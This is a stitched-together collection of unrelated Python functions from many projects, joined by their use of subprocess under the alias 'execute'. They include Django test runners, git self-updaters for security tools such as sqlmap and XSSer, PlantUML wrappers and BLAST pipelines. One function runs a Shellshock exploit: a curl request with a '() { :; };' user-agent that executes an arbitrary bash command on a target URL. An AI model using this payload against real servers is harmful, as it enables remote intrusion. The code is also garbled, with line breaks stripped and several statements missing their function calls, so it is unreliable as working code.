def runtests(foo, settings='settings', extra=[]): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo execute(['./', 'test', '--settings', settings] + extra + apps)
def main(short): # Run some basic tests outside Django's test environment. execute_python(''' from mongodb.models import RawModel RawModel.objects.create(raw=41) RawModel.objects.update(raw=42) RawModel.objects.all().delete() RawModel.objects.create(raw=42) ''') import settings import settings.dbindexer import settings.slow_tests runtests(settings, extra=['--failfast'] if short else []) # Assert we didn't touch the production database. execute_python(''' from mongodb.models import RawModel assert RawModel.objects.get().raw == 42 ''') if short: exit() # Make sure we can syncdb. execute(['./', 'syncdb', '--noinput']) runtests(settings.dbindexer) runtests(['router'], 'settings.router') runtests(settings.INSTALLED_APPS, 'settings.debug') runtests(settings.slow_tests, test_builtin=True)
def __init__(self): rootDir = os.path.abspath( os.path.join(os.path.dirname(__file__), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print "Not any .git repository found!\n" print "=" * 30 print "\nYou should checkout UFONet manually with:\n" print "$ git clone\n" else: checkout = execute("git checkout master", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] if "fast-forwarded" in checkout: reset = execute("git fetch --all", shell=True, stdout=PIPE, stderr=PIPE).communicate() pull = execute("git reset --hard origin/master", shell=True, stdout=PIPE, stderr=PIPE).communicate() print "Congratulations!! UFONet has been updated to latest version ;-)\n" else: print "You are updated! ;-)\n"
def main(short): # Run some basic tests outside Django's test environment execute_python(''' from mongodb.models import RawModel RawModel.objects.create(raw=41) RawModel.objects.update(raw=42) RawModel.objects.all().delete() RawModel.objects.create(raw=42) ''') import settings import settings.dbindexer import settings.slow_tests runtests(settings, extra=['--failfast'] if short else []) # assert we didn't touch the production database execute_python(''' from mongodb.models import RawModel assert RawModel.objects.get().raw == 42 ''') if short: exit() # Make sure we can syncdb. execute(['./', 'syncdb', '--noinput']) runtests(settings.dbindexer) runtests(['router'], 'settings.router') runtests(settings.INSTALLED_APPS, 'settings.debug') runtests(settings.slow_tests, test_builtin=True)
def job(): print("I'm working...") p = os.getcwd() f = p os.chdir(f) execute_command = 'python -d 1' execute(execute_command.split())
def main(short): # Run some basic tests outside Django's test environment execute_python(''' from mongodb.models import RawModel RawModel.objects.create() RawModel.objects.all().delete() RawModel.objects.update() ''') import settings import settings_dbindexer import settings_slow_tests runtests(settings, extra=['--failfast'] if short else []) # assert we didn't touch the production database execute_python(''' from pymongo import Connection print Connection().test.mongodb_rawmodel.find() assert Connection().test.mongodb_rawmodel.find_one()['raw'] == 42 ''') if short: exit() # Make sure we can syncdb. execute(['./', 'syncdb', '--noinput']) runtests(settings_dbindexer) runtests(['router'], 'settings_router') runtests(settings.INSTALLED_APPS, 'settings_debug') runtests(settings_slow_tests)
def generate_filter_file(acr_aca_file, rpsdb_file, INTERMEDIATES): sequence = '' with open(acr_aca_file, 'r') as acr_file: for locus in getLocus(acr_file): proteins = locus.split('\n') if proteins[0].startswith('#'): proteins = proteins[1:len(proteins)] for protein in proteins: item_list = protein.split('\t') if item_list[-4] == 'Acr': sequence += '>' + item_list[6] + '\n' + item_list[-1] + '\n' fasta_file = INTERMEDIATES + 'final_acr.fasta' with open(fasta_file, 'w') as handle: handle.write(sequence) # run rpsblast here rpsblast_file = INTERMEDIATES + 'final_rpsblast.out' execute([ 'rpsblast+', '-query', fasta_file, '-db', rpsdb_file, '-evalue', '.001', '-outfmt', '6', '-out', rpsblast_file ]) return fasta_file, rpsblast_file
def main(short): # Run some basic tests outside Django's test environment execute( ['python', '-c', 'from general.models import Blog\n' 'Blog.objects.create()\n' 'Blog.objects.all().delete()\n' 'Blog.objects.update()'], env=dict(os.environ, DJANGO_SETTINGS_MODULE='settings', PYTHONPATH='..') ) import settings import settings_dbindexer import settings_slow_tests runtests(settings, extra=['--failfast'] if short else []) if short: exit() # Make sure we can syncdb. execute(['./', 'syncdb', '--noinput']) runtests(settings_dbindexer) runtests(['router'], 'settings_router') runtests(settings.INSTALLED_APPS, 'settings_debug') runtests(settings_slow_tests)
def use_cdd(candidateAcrs, ORGANISM_SUBJECT, NEIGHBORHOOD_FAA_PATH, CDD_RESULTS_PATH, CDD_DB_PATH, PROTEIN_UP_DOWN, MIN_NUM_PROTEINS_MATCH_CDD, isProdigalUsed, BLAST_TYPE, THREADS_NUM): with open(NEIGHBORHOOD_FAA_PATH, 'w') as handle: neighborsFaaStr, NEIGHBORHOOD_NUM_maps_NEIGHBORHOOD_WP = get_acr_neighbors( candidateAcrs, ORGANISM_SUBJECT, PROTEIN_UP_DOWN) handle.write(neighborsFaaStr) from subprocess import call as execute if BLAST_TYPE == 'blastp': execute([ 'blastp', '-query', NEIGHBORHOOD_FAA_PATH, '-db', CDD_DB_PATH, '-evalue', '.01', '-outfmt', '7', '-num_threads', THREADS_NUM, '-out', CDD_RESULTS_PATH ]) elif BLAST_TYPE == 'rpsblast': execute([ 'rpsblast+', '-query', NEIGHBORHOOD_FAA_PATH, '-db', CDD_DB_PATH, '-evalue', '.01', '-outfmt', '7', '-out', CDD_RESULTS_PATH ]) return parse_cdd_results(CDD_RESULTS_PATH, NEIGHBORHOOD_NUM_maps_NEIGHBORHOOD_WP, MIN_NUM_PROTEINS_MATCH_CDD, isProdigalUsed)
def build_extension(self, ext): SOURCE_DIR = ext.sourcedir EXT_DIR = path.abspath(path.dirname(self.get_ext_fullpath( BUILD_TEMP = self.build_temp shutil.rmtree(BUILD_TEMP, ignore_errors=True) os.makedirs(BUILD_TEMP) # Run cmake build_type = 'Debug' if self.debug else 'Release' if 0 != execute( [ 'cmake', '-DCMAKE_GENERATOR_PLATFORM=x64', '-DCMAKE_BUILD_TYPE={}'.format(build_type), '-DCMAKE_VERBOSE_MAKEFILE={}'.format(int(self.verbose)), "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY='{}'".format(EXT_DIR), # set Debug and Release paths to the output directory on Windows "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_DEBUG='{}'".format(EXT_DIR), "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_RELEASE='{}'".format( EXT_DIR), self.cmake_args or "--", SOURCE_DIR ], cwd=BUILD_TEMP): sys.exit('\nERROR: Cannot generate Makefile. See above errors.') # Run make cmd = 'cmake --build .' # For MSVC specify build type at build time # if sys.platform.startswith('win'): cmd += ' --config ' + build_type if 0 != execute(cmd, shell=True, cwd=BUILD_TEMP): sys.exit('\nERROR: Cannot find make? See above errors.')
def main(short): # Run some basic tests outside Django's test environment execute([ 'python', '-c', 'from general.models import Blog\n' 'Blog.objects.create()\n' 'Blog.objects.all().delete()\n' 'Blog.objects.update()' ], env=dict(os.environ, DJANGO_SETTINGS_MODULE='settings', PYTHONPATH='..')) import settings import settings_dbindexer import settings_slow_tests runtests(settings, extra=['--failfast'] if short else []) if short: exit() # Make sure we can syncdb. execute(['./', 'syncdb', '--noinput']) runtests(settings_dbindexer) runtests(['router'], 'settings_router') runtests(settings.INSTALLED_APPS, 'settings_debug') runtests(settings_slow_tests)
def command(text, success_message): try: execute(text.split(' ')) print(success_message) except CalledProcessError as e: print(f'Something went wrong.\n' f'Error code: {e.returncode}\n' f'More info: {e.output}\n') exit(1)
def runtests(foo, settings='settings', extra=[], test_builtin=False): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo if not test_builtin: apps = filter(lambda name: not name.startswith('django.contrib.'), apps) execute(['./', 'test', '--settings', settings] + extra + apps)
def runtests(foo, settings="settings", extra=[], test_builtin=False): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo if not test_builtin: apps = filter(lambda name: not name.startswith("django.contrib."), apps) apps = [app.replace("django.contrib.", "") for app in apps] execute(["./", "test", "--settings", settings] + extra + apps)
def runtests(foo, settings='settings', extra=[], test_builtin=False): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo if not test_builtin: apps = filter(lambda name: not name.startswith('django.contrib.'), apps) apps = [app.replace('django.contrib.', '') for app in apps] execute(['./', 'test', '--settings', settings] + extra + apps)
def produce_tex(template, filename, context, compile=True): """Генерирует новый .tex-файл РПД, подставляя данные контекста в шаблон. Если compile==True, вызывает xelatex на полученном файле""" fn = splitpath(filename)[1] tex_file = splitext(fn)[0] + '.tex' output = open(tex_file, 'w', encoding='utf-8') output.write(template.render(**context)) output.close() if compile: sleep(0.5) execute(['xelatex', '--synctex=1', tex_file])
def run(self): from subprocess import run as execute from sys import exit try: exploit = 'curl -H \"user-agent: () { :; }; echo; echo; /bin/bash -c ' exploit += '\'' + self.cmd + '\'"' exploit += ' ' + self.url print(f"Executing payload:\n{exploit}") execute(exploit, shell=True) except: raise Exception("an error occured running the exploit!!!") return
def runtests(foo, settings='settings', extra=[], test_builtin=False): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo if not test_builtin: apps = [name for name in apps if not name.startswith('django.contrib.')] # pre-1.6 test runners don't understand full module names import django if django.VERSION < (1, 6): apps = [app.replace('django.contrib.', '') for app in apps] execute(['./', 'test', '--settings', settings] + extra + apps)
def create_gff_faa_with_prodigal(FNA_FILE, DIR, GCF): print('Using prodigal to generate gff and faa file...') GFF_FILE = DIR + GCF + '.gff' FAA_FILE = DIR + GCF + '.faa' execute([ 'prodigal', '-f', 'gff', '-i', FNA_FILE, '-o', GFF_FILE, '-q', '-a', FAA_FILE ]) execute(['cp', FNA_FILE, SUBJECTS_DIR]) print('Done\n\n') return GFF_FILE, FAA_FILE
def runtests(foo, settings='settings', extra=[], test_builtin=False): if isinstance(foo, ModuleType): settings = foo.__name__ apps = foo.INSTALLED_APPS else: apps = foo if not test_builtin: apps = filter(lambda name: not name.startswith('django.contrib.'), apps) # pre-1.6 test runners don't understand full module names import django if django.VERSION < (1, 6): apps = [app.replace('django.contrib.', '') for app in apps] execute(['./', 'test', '--settings', settings] + extra + apps)
def __init__(self): rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print "Not any .git repository found!\n" print "="*30 print "\nYou should checkout UFONet manually with:\n" print "$ git clone\n" else: checkout = execute("git checkout master", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] if "fast-forwarded" in checkout: reset = execute("git fetch --all", shell=True, stdout=PIPE, stderr=PIPE).communicate() pull = execute("git reset --hard origin/master", shell=True, stdout=PIPE, stderr=PIPE).communicate() print "Congratulations!! UFONet has been updated to latest version ;-)\n" else: print "You are updated! ;-)\n"
def __init__(self): GIT_REPOSITORY = "" rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print "Not any .git repository found!\n" print "="*30 print "\nYou should clone XSSer manually with:\n" print "$ git clone %s" % GIT_REPOSITORY + "\n" else: checkout = execute("git checkout .", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] if "fast-forwarded" in checkout: pull = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE).communicate() print "Congratulations!! XSSer has been updated to latest version ;-)\n" else: print "You are updated! ;-)\n"
def __init__(self): GIT_REPOSITORY = "" rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print "Not any .git repository found!\n" print "="*30 print "\nTo have working this feature, you should clone CIntruder with:\n" print "$ git clone %s" % GIT_REPOSITORY +"\n" else: checkout = execute("git checkout .", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] if "fast-forwarded" in checkout: pull = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE).communicate() print "Congratulations!! CIntruder has been updated to latest version ;-)\n" else: print "You are updated! ;-)\n"
def update(self): if not os.path.dirname(os.path.abspath(__file__)): print("not a git repository. Please checkout " + "the 'rfunix/Pompem' repository") print("from GitHub (e.g. git clone " + " Pompem-dev") else: print("updating Pompem to the latest development version" + " from the GitHub repository") print("[{0}] [INFO] update in progress ".format(time.strftime("%X"))) process = execute("git pull {0} HEAD".format(self.git_repository), shell=True, stdout=PIPE, stderr=PIPE) self.companying_process(process) stdout, stderr = process.communicate() success = not process.returncode if success: print("Update was successful") else: print("Update unrealized") if not success: if "windows" in str(platform.system()).lower(): print("for Windows platform it's recommended ") print("to use a GitHub for Windows client for updating ") print("purposes ( or just ") print("download the latest snapshot from ") print("") else: print("for Linux platform it's required ") print("to install a standard 'git' package" + "(e.g.: 'sudo apt-get install git')") return success
def check_plantuml_version(self): puml = execute( [ 'java', '-jar', self.plantuml_jar_path, '-version' ], stdout=PIPE, stderr=STDOUT ) version_output = '' first = True while first or puml.returncode is None: first = False (stdout, stderr) = puml.communicate() version_output += stdout print "Version Detection:" print version_output assert puml.returncode == 0, "PlantUML returned an error code" assert self.PLANTUML_VERSION_STRING in version_output, \ "error verifying PlantUML version"
def getRevisionNumber(): """ Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" """ retVal = None filePath = None _ = os.path.dirname(__file__) while True: filePath = os.path.join(_, ".git/refs/heads/master").replace('/', os.path.sep) if os.path.exists(filePath): break else: filePath = None if _ == os.path.dirname(_): break else: _ = os.path.dirname(_) if filePath: with open(filePath, "r") as f: match = re.match(r"(?i)[0-9a-f]{32}", retVal = if match else None if not retVal: process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) stdout, _ = process.communicate() match ="(?i)[0-9a-f]{32}", stdout or "") retVal = if match else None return retVal[:7] if retVal else None
def update(self): if self.check(): # Instead of checking tag names, commit hashes is checked for # foolproof method. if self.last_commit_hash() != self.remote_tags[0]["commit"]["sha"]: cprint( "Trying to update OWTF to %s" % self.remote_tags[0]["name"]) command = ( "git pull; git reset --soft %s" % self.remote_tags[0]["name"]) process = execute( command, shell=True, env=self.process_environ, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate() success = not process.returncode if success: cprint( "OWTF Successfully Updated to Latest Stable Version!!") cprint("Version Tag: %s" % self.remote_tags[0]["name"]) cprint( "Please run install script if you face any errors " "after updating") else: cprint("Unable to update :(") else: cprint( "Seems like you are running latest version => %s" % self.remote_tags[0]["name"]) cprint("Happy pwning!! :D")
def update(self): if not os.path.dirname(os.path.abspath(__file__)): print("not a git repository. Please checkout the 'rfunix/Pompem' repository") print("from GitHub (e.g. git clone Pompem-dev") else: print ("updating Pompem to the latest development version from the GitHub repository") print ("[%s] [INFO] update in progress " % time.strftime("%X")) process = execute("git pull %s HEAD" % self.gitRepository, shell=True, stdout=PIPE, stderr=PIPE) self.companyingProcess(process) stdout, stderr = process.communicate() success = not process.returncode if success: print("Update was successful") else: print("Update unrealized") if not success: if "windows" in str(platform.system()).lower(): print("for Windows platform it's recommended ") print("to use a GitHub for Windows client for updating ") print("purposes ( or just ") print("download the latest snapshot from ") print("") else: print("for Linux platform it's required ") print("to install a standard 'git' package (e.g.: 'sudo apt-get install git')") return success
def update(): if not conf.updateAll: return rootDir = paths.SQLMAP_ROOT_PATH infoMsg = "updating sqlmap to the latest development version from the " infoMsg += "GitHub repository" debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) process = execute("git pull %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE) pollProcess(process, True) stdout, stderr = process.communicate() if not process.returncode:"%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION)) else: logger.error("update could not be completed (%s)" % repr(stderr)) if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " infoMsg += "purposes (" else: infoMsg = "for Linux platform it's recommended " infoMsg += "to use a standard 'git' package (e.g.: 'sudo apt-get install git')"
def _convert_headered_wavefile_to_flac(inputfilename, outputfilename): """ Converts a wavefile into flac data file Arguments: - `inputfilename`: Read Headered wave data from this file - `outputfilename`: Save FLAC data to this file (overwrite existing file) FLAC will be saved at 16k samples/sec """ conversion_command = [sox_binary, inputfilename, "-t", "flac", "-r", "16k", outputfilename] conversion_success = True retcode = 0 try: retcode = execute(conversion_command) except Exception as e: print >> sys.stderr, "Error: %s" % e conversion_success = False if retcode != 0: conversion_success = False return conversion_success
def __init__(self): GIT_REPOSITORY = "" GIT_REPOSITORY2 = "" rootDir = os.path.abspath( os.path.join(os.path.dirname(__file__), '..', '')) if not os.path.exists(".git"): print("Not any .git repository found!\n") print("=" * 30) print( "\nTo have working this feature, you should clone XSSer with:\n" ) print("$ git clone %s" % GIT_REPOSITORY) print("\nAlso you can try this other mirror:\n") print("$ git clone %s" % GIT_REPOSITORY2 + "\n") else: checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] print("[Info] [GitHub] Reply:\n\n" + checkout.decode('utf-8')) if not b"Already up-to-date" in checkout: print( "[Info] [AI] Congratulations!! XSSer has been updated... ;-)\n" ) else: print( "[Info] [AI] Your XSSer doesn't need to be updated... ;-)\n" )
def _generate(self): command = [ 'java', '-jar', self.proc.plantuml_jar_path, '-pipe', '-tpng', '-charset', 'UTF-8' ] charset = self.proc.CHARSET if charset: print('using charset: ' + charset) command.append("-charset") command.append(charset) puml = execute( command, stdin=PIPE, stdout=self.file, **EXTRA_CALL_ARGS ) puml.communicate(input=self.text.encode('UTF-8')) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file
def __init__(self): GIT_REPOSITORY = "" GIT_REPOSITORY2 = "" rootDir = os.path.abspath( os.path.join(os.path.dirname(__file__), '..', '')) if not os.path.exists(os.path.join(rootDir, ".git")): print("-" * 22) print("\n[Info] Not any .git repository found!") print( "\nTo have working this feature, you should clone pydgo4apache with:\n" ) print("$ git clone %s" % GIT_REPOSITORY) print("\nAlso you can try this other mirror:\n") print("$ git clone %s" % GIT_REPOSITORY2 + "\n") else: checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0] print(checkout) if not "Already up-to-date" in checkout: print( "Congratulations!! pydog4apache has been updated... ;-)\n") else: print("Your pydog4apache doesn't need to be updated... ;-)\n")
def pack(self, srcFile, dstFile=None): self.__initialize(srcFile, dstFile) logger.debug("executing local command: %s" % self.__upxCmd) process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT) dataToStdout("\r[%s] [INFO] compression in progress " % time.strftime("%X")) pollProcess(process) upxStdout, upxStderr = process.communicate() if hasattr(self, '__upxTempExe'): os.remove( msg = "failed to compress the file" if "NotCompressibleException" in upxStdout: msg += " because you provided a Metasploit version above " msg += "3.3-dev revision 6681. This will not inficiate " msg += "the correct execution of sqlmap. It might " msg += "only slow down a bit the execution" logger.debug(msg) elif upxStderr: logger.warn(msg) else: return os.path.getsize(srcFile) return None
def update(self): # The main update method if self.check(): # Insted of checking tag names, commit hashes is checked for foolproof method if self.last_commit_hash() != self.remote_tags[0]["commit"]["sha"]: cprint("Trying to update OWTF to %s" % (self.remote_tags[0]["name"])) command = ("git pull; git reset --soft %s" % (self.remote_tags[0]["name"])) process = execute(command, shell=True, env=self.process_environ, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate() success = not process.returncode if success: cprint( "OWTF Successfully Updated to Latest Stable Version!!") cprint("Version Tag: %s" % (self.remote_tags[0]["name"])) cprint( "Please run install script if you face any errors after updating" ) else: cprint("Unable to update :(") else: cprint("Seems like you are running latest version => %s" % (self.remote_tags[0]["name"])) cprint("Happy pwning!! :D")
def _generate(self): command = [ 'java', '-jar', self.proc.plantuml_jar_path, '-pipe', '-t%s' % self.output, '-charset', 'UTF-8' ] charset = self.proc.CHARSET if charset: print('using charset: ' + charset) command.append("-charset") command.append(charset) puml = execute( command, stdin=PIPE, stdout=self.file, stderr=DEVNULL, **EXTRA_CALL_ARGS ) puml.communicate(input=self.text.encode('UTF-8')) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file
def generate(self, index, isPreview): outputFormat = self.proc.FORMAT startDir = split(self.sourceFile)[0] fileName = self.get_file_name(index)+'.'+outputFormat status_message("Generating Diagram: "+fileName) if isPreview: outputfile =join(gettempdir(), 'TempDiagrams', fileName) else: outputfile =join(startDir, fileName) # print(outputfile) newPath = split(outputfile)[0] if not exists(newPath): print(newPath+' not exists, creating...') makedirs(newPath) else: if not isdir(newPath): error_message( 'The path is already exists, and it''s not a folder.\\n'+ newPath+'\\n'+ 'Please remove or rename it before you generate diagrams.' ) return self.file = open(outputfile,"w") # cmd='java -Dplantuml.include.path="%s" -jar "%s" -pipe -t%s' % (startDir,self.proc.plantuml_jar_path, outputFormat) # command=shlex_split(cmd) command = [ 'java', '-Dplantuml.include.path=%s' % startDir, '-jar', self.proc.plantuml_jar_path, '-pipe', '-t'+outputFormat ] charset = self.proc.CHARSET if charset: pass else: charset = 'UTF-8' #print('using charset: '+charset) command.append("-charset") command.append(charset) puml = execute( command, stdin=PIPE, stdout=self.file, **EXTRA_CALL_ARGS ) puml.communicate(input=self.text.encode(charset)) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file
def getRevisionNumber(): retVal = None filePath = None _ = os.path.dirname(__file__) while True: filePath = os.path.join(_, ".git/refs/heads/master").replace('/', os.path.sep) if os.path.exists(filePath): break else: filePath = None if _ == os.path.dirname(_): break else: _ = os.path.dirname(_) if filePath: with open(filePath, "r") as f: match = re.match(r"(?i)[0-9a-f]{32}", retVal = if match else None if not retVal: process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) stdout, _ = process.communicate() match ="(?i)[0-9a-f]{32}", stdout or "") retVal = if match else None return retVal[:10] if retVal else None
def scrapy_ccass(d): p = os.getcwd() queue_folder = p + '/' + 'queue' queue_file = datetime2filename(d=queue_folder) with open(queue_file, 'a') as outfile: json.dump(d, outfile) # change working directory and run spider spider_folder = p + '/' + 'crawl_worker' os.chdir(spider_folder) spider_name = 'get_ccass' execute_command = 'scrapy crawl ' + spider_name + ' -a queue_file=' + queue_file execute(execute_command.split()) # return working directory os.chdir(p)
def last_commit_hash(self): # This function returns the last commit hash in local repo command = ("git --git-dir=%s log -n 1 "%(self.git_dir)) command += "--pretty=format:%H" process = execute(command, shell=True, env=self.process_environ, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate() commit_hash = stdout.strip() return commit_hash
def _runMsfCli(self, exitfunc): self._forgeMsfCliCmd(exitfunc) infoMsg = "running Metasploit Framework command line " infoMsg += "interface locally, please wait.." logger.debug("executing local command: %s" % self._cliCmd) self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def initialize(self, service=None): """ Initializes the test environment """ if service: self.fnull = open(os.devnull, 'w') self.service = execute(service, stdout=self.fnull, stderr=self.fnull) log.debug("%s service started: %s", service, time.sleep(0.2) else: self.service = None log.debug("%s context started", self.context)
def __runMsfCli(self, exitfunc): self.__forgeMsfCliCmd(exitfunc) infoMsg = "running Metasploit Framework command line " infoMsg += "interface locally, please wait.." logger.debug("executing local command: %s" % self.__cliCmd) self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def blast_spacers(SELECT_SPACER_FASTA: str, MASKED_FNA: str, DIR: str): BLAST_FILE = DIR + 'blast_out.txt' # file to store blastn results REQURIED_IDENTITY = '95.0' # percent identity needed in order to consider blast result print('\n\nUsing blastn on CRISPR arrays...') execute( ['makeblastdb', '-in', MASKED_FNA, '-dbtype', 'nucl'] ) # makes DB for blast using the masked FNA file created in previous steps with open(BLAST_FILE, 'w') as handle: execute([ 'blastn', '-db', MASKED_FNA, '-query', SELECT_SPACER_FASTA, '-outfmt', '6', '-perc_identity', REQURIED_IDENTITY ], stdout=handle) # runs blastn print('\nDone\n\n') return BLAST_FILE
def __runMsfConsole(self): infoMsg = "running Metasploit Framework 3 console locally, please wait.." logger.debug("executing local command: %s" % self.__consoleCmd) self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def generate(self, index, isPreview): outputFormat = self.proc.FORMAT startDir = split(self.sourceFile)[0] fileName = self.get_file_name(index) + '.' + outputFormat status_message("Generating Diagram: " + fileName) if isPreview: outputfile = os.sep.join([gettempdir(), 'TempDiagrams', fileName]) else: outputfile = os.sep.join([startDir, fileName]) print(outputfile) newPath = split(outputfile)[0] if not exists(newPath): print(newPath + ' not exists, creating...') makedirs(newPath) else: if not isdir(newPath): error_message( 'The path is already exists, and it' 's not a folder.\\n' + newPath + '\\n' + 'Please remove or rename it before you generate diagrams.') return self.file = open(outputfile, "w") # cmd='java -Dplantuml.include.path="%s" -jar "%s" -pipe -t%s' % (startDir,self.proc.plantuml_jar_path, outputFormat) # command=shlex_split(cmd) command = [ 'java', '-Dplantuml.include.path=%s' % startDir, '-jar', self.proc.plantuml_jar_path, '-pipe', '-t' + outputFormat ] charset = self.proc.CHARSET if charset: pass else: charset = 'UTF-8' #print('using charset: '+charset) command.append("-charset") command.append(charset) puml = execute(command, stdin=PIPE, stdout=self.file, **EXTRA_CALL_ARGS) puml.communicate(input=self.text.encode(charset)) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file
def __updateSqlmap(): rootDir = paths.SQLMAP_ROOT_PATH infoMsg = "updating sqlmap to latest development version from the " infoMsg += "subversion repository" try: import pysvn debugMsg = "sqlmap will update itself using installed python-svn " debugMsg += "third-party library," logger.debug(debugMsg) def notify(event_dict): action = str(event_dict['action']) index = action.find('_') prefix = action[index + 1].upper() if index != -1 else action.capitalize() if action.find('_update') != -1: return if action.find('_completed') == -1: print "%s\t%s" % (prefix, event_dict['path']) else: revision = str(event_dict['revision']) index = revision.find('number ') if index != -1: revision = revision[index+7:].strip('>')'updated to the latest revision %s' % revision) client = pysvn.Client() client.callback_notify = notify client.update(rootDir) except ImportError, _: debugMsg = "sqlmap will try to update itself using 'svn' command" logger.debug(debugMsg) process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) pollProcess(process) svnStdout, svnStderr = process.communicate() if svnStderr: errMsg = svnStderr.strip() logger.error(errMsg) elif svnStdout: revision ="revision\s+([\d]+)", svnStdout, re.I) if revision:'updated to the latest revision %s' %
def initialize(self, service=None): ''' Initializes the test environment ''' if service: self.fnull = open(os.devnull, 'w') self.service = execute(service, stdout=self.fnull, stderr=self.fnull) log.debug("%s service started: %s", service, time.sleep(0.2) else: self.service = None log.debug("%s context started", self.context)
def generate(self): puml = execute( ['java', '-jar', self.proc.plantuml_jar_path, '-pipe', '-tpng'], stdin=PIPE, stdout=self.file) puml.communicate(input=self.text.encode('UTF-8')) if puml.returncode != 0: print("Error Processing Diagram:") print(self.text) return else: return self.file
def last_commit_hash(self): # This function returns the last commit hash in local repo command = ("git --git-dir=%s log -n 1 " % (self.git_dir)) command += "--pretty=format:%H" process = execute(command, shell=True, env=self.process_environ, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate() commit_hash = stdout.strip() return commit_hash
def check_plantuml_functionality(self): puml = execute( ["java", "-jar", self.plantuml_jar_path, "-testdot"], stdout=PIPE, stderr=STDOUT, **EXTRA_CALL_ARGS ) (stdout, stderr) = puml.communicate() dot_output = str(stdout) print("PlantUML Smoke Check:") print(dot_output) if ("OK" not in dot_output) or ("Error" in dot_output): raise Exception("PlantUML does not appear functional")
def update(): if not conf.updateAll: return success = False rootDir = paths.SQLMAP_ROOT_PATH if not os.path.exists(os.path.join(rootDir, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 'git clone sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " infoMsg += "GitHub repository" debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE) pollProcess(process, True) stdout, stderr = process.communicate() success = not process.returncode if success: import lib.core.settings _ = lib.core.settings.REVISION = getRevisionNumber()"%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) else: if "Not a git repository" in stderr: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 'git clone sqlmap')" logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " infoMsg += "purposes ( or just " infoMsg += "download the latest snapshot from " infoMsg += "" else: infoMsg = "for Linux platform it's required " infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
def main(short): # Run some basic tests outside Django's test environment execute_python( """ from mongodb.models import RawModel RawModel.objects.create() RawModel.objects.all().delete() RawModel.objects.update() """ ) import settings import settings.dbindexer import settings.slow_tests runtests(settings, extra=["--failfast"] if short else []) # assert we didn't touch the production database execute_python( """ from pymongo import Connection print Connection().test.mongodb_rawmodel.find() assert Connection().test.mongodb_rawmodel.find_one()['raw'] == 42 """ ) if short: exit() # Make sure we can syncdb. execute(["./", "syncdb", "--noinput"]) runtests(settings.dbindexer) runtests(["router"], "settings.router") runtests(settings.INSTALLED_APPS, "settings.debug") runtests(settings.slow_tests, test_builtin=True)
